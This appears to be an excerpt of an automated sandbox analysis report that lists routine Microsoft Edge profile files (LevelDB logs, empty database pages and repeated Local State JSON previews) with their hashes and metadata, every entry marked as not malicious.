                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):281
                                                                                                                                                                                    Entropy (8bit):5.165064183346462
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:iOrTjjc81wkn23oH+Tcwtfrl2KLl5YuM+q2Pwkn23oH+TcwtfrK+IFUv:7fj4fYeb1Lu+vYfYeb23FUv
                                                                                                                                                                                    MD5:3DEFC1FBA9AC4BE66350B61EAA632496
                                                                                                                                                                                    SHA1:2AB94A70E1FDB67741E9C61802C4C138DE813FD7
                                                                                                                                                                                    SHA-256:AB0649DE0A98F5F378E0CB54735CD6B705708D907535EFABEA57DA4906C84473
                                                                                                                                                                                    SHA-512:0C20D82701ED907CD38CB063F96EA197490E24711FAB2ACD332B538BCFB6CF8C7A036CEBA2607ED632C1C5C21BEDCF4F1291264585861EC549B57B9BA9B1F32D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:2025/01/09-09:30:01.980 19ec Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db since it was missing..2025/01/09-09:30:02.207 19ec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                    Entropy (8bit):4.704993772857998
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):617
                                                                                                                                                                                    Entropy (8bit):3.9325179151892424
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:G0nYUteza//z3p/Uz0RuWlJhC+lvBavRtin01zv0:G0nYUtezaD3RUovhC+lvBOL0
                                                                                                                                                                                    MD5:AD15D72AA4792C14DDD002CED70E8245
                                                                                                                                                                                    SHA1:30D0E75166FDA7126A73480EE3222C193231B579
                                                                                                                                                                                    SHA-256:17A781FB31D3176491D9B277ADEEE5521972C68956A2271637BBCBFEB27D6A7D
                                                                                                                                                                                    SHA-512:20B8D19B529A392FE0CBB44844926210D98C477498377B8370AA3A3A763C047EF96BE341686406522868EF848C83EF5EF4792B17CDD0462D4680EDA542C8A54F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................21_.....n[.=.................33_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.....
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):299
                                                                                                                                                                                    Entropy (8bit):5.138195780723973
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:iOrTSV881wkn23oH+Tcwtfrzs52KLl5TSdH3+q2Pwkn23oH+TcwtfrzAdIFUv:7f/fYebs9LLI3+vYfYeb9FUv
                                                                                                                                                                                    MD5:2BCF2B0F6E5870C7692AE185FB1AA4C8
                                                                                                                                                                                    SHA1:F24A745A20461F3B0F05EADDF03EA3687E16A9EA
                                                                                                                                                                                    SHA-256:13C5AA391E2DF5504907EE2229D1D6ECD170C161BDA13D71DF7FE9D024ADB33E
                                                                                                                                                                                    SHA-512:D783CF61396DAE65CC07DF3D8FF0A38729D3E1534DD64FD86AB89BD53D84A4DE0F0BD942765E0E1FA9038B12A9A5856E0C7A62206E2CD47B600D4D82302CF330
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:2025/01/09-09:30:01.970 19ec Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata since it was missing..2025/01/09-09:30:01.978 19ec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                    Entropy (8bit):4.704993772857998
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                                    Entropy (8bit):0.01057775872642915
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:MsFl:/F
                                                                                                                                                                                    MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                    SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                    SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                    SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):270336
                                                                                                                                                                                    Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                    MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                    SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                    SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                    SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                                    Entropy (8bit):0.011852361981932763
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                    MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                    SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                    SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                    SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                                    Entropy (8bit):0.012340643231932763
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                    MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                    SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                    SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                    SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):262512
                                                                                                                                                                                    Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:LsNl2Wq:Ls32Wq
                                                                                                                                                                                    MD5:FD81D7DE9ABE158F684B729BCFB03584
                                                                                                                                                                                    SHA1:32D76E73D26793C37052E8A92491CF2F7557CEB9
                                                                                                                                                                                    SHA-256:2DB9328AF80136065B45F38483DB007AD0F4C976A7875B76B6BC9BA0865CC86A
                                                                                                                                                                                    SHA-512:036747340845A52723C20F9687157D0411C7725238A1D9AFD6933BB34AB1721749FCACDA51551D9B598D045C21533045552D91F45A86E3CD75CE43F014391FAD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:........................................~..../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                                    Entropy (8bit):0.01057775872642915
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:MsFl:/F
                                                                                                                                                                                    MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                    SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                    SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                    SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):270336
                                                                                                                                                                                    Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                    MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                    SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                    SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                    SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                                    Entropy (8bit):0.011852361981932763
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                    MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                    SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                    SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                    SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                                    Entropy (8bit):0.012340643231932763
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                    MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                    SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                    SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                    SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):262512
                                                                                                                                                                                    Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:LsNlw8+l/:Ls3w8+l/
                                                                                                                                                                                    MD5:B38F91F15922EDE50DE3F0DD6BF095C9
                                                                                                                                                                                    SHA1:F555F3CA61A2F57AF2E398AB9BB786A5D15B4C71
                                                                                                                                                                                    SHA-256:571CC6DAFC118EF238F9BDD2EC2C8A5104DAD4D9C188194EC722660EC3CE4860
                                                                                                                                                                                    SHA-512:84CB54A2B9FFB68B6DC7A8A00A68F7B7C608479D34B14077285DDCD877AFDBDFACA3BA29EEC181AD56307C024B2666051AE38249874942AB7B951C6E610E8F82
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:........................................U..../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):120
                                                                                                                                                                                    Entropy (8bit):3.32524464792714
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                    MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                    SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                    SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                    SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):13
                                                                                                                                                                                    Entropy (8bit):2.7192945256669794
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                    MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                    SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                    SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                    SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:117.0.2045.47
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):6820
                                                                                                                                                                                    Entropy (8bit):5.790644179820606
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:ak8BoeiRUpthQc6qRAq1k8SPxVLZ7VTiq:akJCQc6q3QxVNZTiq
                                                                                                                                                                                    MD5:E344CDFEFE09EF8F1A30F6A15B2BBDF1
                                                                                                                                                                                    SHA1:49B0A723665484DCE70126E81C073D1B301EE82A
                                                                                                                                                                                    SHA-256:929397D69A9597CF197A406975128B990D6EB65C79C56B910A896F90F684848B
                                                                                                                                                                                    SHA-512:C27FD5D2C539F30127F0291337C08EAE37EF210BDC8906FCDBAD50B54C5BB7B119BE82BF5CCD7B8817E86EF32B771E8463EAC7F69D1F27AC8882F526789D25EE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAC8CK533tb6QaejX7o75gqCEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADBOi7+y60hQFGCDCz0FBh1Y7fVnmacANSYaXNgsyAQbgAAAAA
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):6820
                                                                                                                                                                                    Entropy (8bit):5.790644179820606
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:ak8BoeiRUpthQc6qRAq1k8SPxVLZ7VTiq:akJCQc6q3QxVNZTiq
                                                                                                                                                                                    MD5:E344CDFEFE09EF8F1A30F6A15B2BBDF1
                                                                                                                                                                                    SHA1:49B0A723665484DCE70126E81C073D1B301EE82A
                                                                                                                                                                                    SHA-256:929397D69A9597CF197A406975128B990D6EB65C79C56B910A896F90F684848B
                                                                                                                                                                                    SHA-512:C27FD5D2C539F30127F0291337C08EAE37EF210BDC8906FCDBAD50B54C5BB7B119BE82BF5CCD7B8817E86EF32B771E8463EAC7F69D1F27AC8882F526789D25EE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAC8CK533tb6QaejX7o75gqCEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADBOi7+y60hQFGCDCz0FBh1Y7fVnmacANSYaXNgsyAQbgAAAAA
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):6820
                                                                                                                                                                                    Entropy (8bit):5.790644179820606
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:ak8BoeiRUpthQc6qRAq1k8SPxVLZ7VTiq:akJCQc6q3QxVNZTiq
                                                                                                                                                                                    MD5:E344CDFEFE09EF8F1A30F6A15B2BBDF1
                                                                                                                                                                                    SHA1:49B0A723665484DCE70126E81C073D1B301EE82A
                                                                                                                                                                                    SHA-256:929397D69A9597CF197A406975128B990D6EB65C79C56B910A896F90F684848B
                                                                                                                                                                                    SHA-512:C27FD5D2C539F30127F0291337C08EAE37EF210BDC8906FCDBAD50B54C5BB7B119BE82BF5CCD7B8817E86EF32B771E8463EAC7F69D1F27AC8882F526789D25EE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAC8CK533tb6QaejX7o75gqCEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADBOi7+y60hQFGCDCz0FBh1Y7fVnmacANSYaXNgsyAQbgAAAAA
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):6820
